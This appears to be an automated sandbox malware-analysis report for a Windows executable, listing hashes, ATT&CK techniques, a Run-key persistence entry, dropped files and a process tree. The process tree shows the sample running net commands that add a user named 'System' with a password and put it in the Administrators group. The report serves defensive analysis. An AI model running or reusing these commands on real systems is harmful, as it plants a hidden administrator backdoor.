87d19e3bff436f6d204095917f7a2b1dd58d093d637b8cc0a6aa38b761832241

Analysis

max time kernel
141s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
03/02/2024, 00:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8ae7bb9d6119c991386fa9ed8149c33e.exe
Size

54KB
MD5

8ae7bb9d6119c991386fa9ed8149c33e
SHA1

2647ea011d14a51443c4e83c85e64124ab166d31
SHA256

87d19e3bff436f6d204095917f7a2b1dd58d093d637b8cc0a6aa38b761832241
SHA512

5239f922e773828896c6bfb98ec0cf1bc9688eadb3e858fa27cb71ed2f691d5e0ada63b8b14ab65139046d887d168f540e8062ff9fdea562cb0db980fc656a21
SSDEEP

1536:ts+Zgajv3kHK35Y0RKsZ1Ls3JcBHHx/KboFwbQp8X:tFC4kq35Yds/Ls3JcBnAFby8

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	8ae7bb9d6119c991386fa9ed8149c33e.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows System Configuration = "C:\\Windows\\SYSCFG16.EXE"	8ae7bb9d6119c991386fa9ed8149c33e.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SYSCFG16.EXE	8ae7bb9d6119c991386fa9ed8149c33e.exe
File opened for modification	C:\Windows\SYSCFG16.EXE	8ae7bb9d6119c991386fa9ed8149c33e.exe
File created	C:\Windows\temp.bat	8ae7bb9d6119c991386fa9ed8149c33e.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 4696 wrote to memory of 380	4696	8ae7bb9d6119c991386fa9ed8149c33e.exe	96
PID 4696 wrote to memory of 380	4696	8ae7bb9d6119c991386fa9ed8149c33e.exe	96
PID 4696 wrote to memory of 380	4696	8ae7bb9d6119c991386fa9ed8149c33e.exe	96
PID 380 wrote to memory of 1200	380	cmd.exe	98
PID 380 wrote to memory of 1200	380	cmd.exe	98
PID 380 wrote to memory of 1200	380	cmd.exe	98
PID 1200 wrote to memory of 2540	1200	net.exe	99
PID 1200 wrote to memory of 2540	1200	net.exe	99
PID 1200 wrote to memory of 2540	1200	net.exe	99
PID 380 wrote to memory of 3460	380	cmd.exe	100
PID 380 wrote to memory of 3460	380	cmd.exe	100
PID 380 wrote to memory of 3460	380	cmd.exe	100
PID 3460 wrote to memory of 1660	3460	net.exe	101
PID 3460 wrote to memory of 1660	3460	net.exe	101
PID 3460 wrote to memory of 1660	3460	net.exe	101

C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe
"C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Windows\temp.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:380
- - C:\Windows\SysWOW64\net.exe
    net user /add System hakt
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user /add System hakt
      4⤵
      PID:2540
- - C:\Windows\SysWOW64\net.exe
    net localgroup /add Administrators System
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3460
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup /add Administrators System
      4⤵
      PID:1660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\temp.bat

Filesize
89B

MD5
dccbf9e7aa8e5e8a7d44c634aa4b3e8a

SHA1
a2e14c86d1a890f37afe11e0ef02f3b5f05cf3c3

SHA256
554c21f981ac2139afa84e5af335c54fce3e0b05db145abef9eb7b2c23612398

SHA512
8581f237ce5a9df85ebee9f23fe56f6f27d37c6ea66e9c40cd73b6b85487b6e915f83e5a2740eabed7cd2133c6dca46bd062c5429e2223904ffd9aaff09c8e28

Download Submit
memory/4696-0-0x0000000000510000-0x0000000000520000-memory.dmp

Filesize
64KB

Download
memory/4696-1-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4696-2-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4696-3-0x0000000000510000-0x0000000000520000-memory.dmp

Filesize
64KB

Download
memory/4696-5-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads